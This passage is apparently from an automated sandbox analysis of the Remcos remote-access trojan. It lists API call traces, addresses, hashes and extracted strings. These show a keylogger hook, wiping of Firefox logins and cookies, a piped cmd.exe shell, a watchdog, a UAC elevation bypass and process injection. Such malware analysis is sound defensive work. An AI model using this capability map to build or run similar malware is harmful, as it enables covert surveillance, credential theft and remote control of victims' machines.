                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                • API String ID: 1067849700-181434739
                                                • Opcode ID: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                • Opcode Fuzzy Hash: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                • API String ID: 2994406822-18413064
                                                • Opcode ID: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                • Opcode Fuzzy Hash: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                • OpenMutexA.KERNEL32 ref: 00412181
                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                • API String ID: 3018269243-13974260
                                                • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFile$FirstNext
                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                • API String ID: 1164774033-3681987949
                                                • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                APIs
                                                • OpenClipboard.USER32 ref: 004168FD
                                                • EmptyClipboard.USER32 ref: 0041690B
                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                • CloseClipboard.USER32 ref: 00416990
                                                • OpenClipboard.USER32 ref: 00416997
                                                • GetClipboardData.USER32 ref: 004169A7
                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                • CloseClipboard.USER32 ref: 004169BF
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                • String ID: !D@
                                                • API String ID: 3520204547-604454484
                                                • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Close$File$FirstNext
                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 3527384056-432212279
                                                • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                APIs
                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                • String ID:
                                                • API String ID: 297527592-0
                                                • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                • API String ID: 3756808967-1743721670
                                                • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                • API String ID: 0-1861860590
                                                • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                APIs
                                                • _wcslen.LIBCMT ref: 0040755C
                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Object_wcslen
                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                • API String ID: 240030777-3166923314
                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                • String ID:
                                                • API String ID: 3587775597-0
                                                • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                • String ID: JD$JD$JD
                                                • API String ID: 745075371-3517165026
                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFile$FirstNext
                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 1164774033-405221262
                                                • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2341273852-0
                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$CreateFirstNext
                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                • API String ID: 341183262-3812160132
                                                • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                • GetLastError.KERNEL32 ref: 0040A328
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • GetMessageA.USER32 ref: 0040A376
                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                Strings
                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                • String ID: Keylogger initialization failure: error
                                                • API String ID: 3219506041-952744263
                                                • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                • String ID:
                                                • API String ID: 1888522110-0
                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                Strings
                                                Memory Dump Source
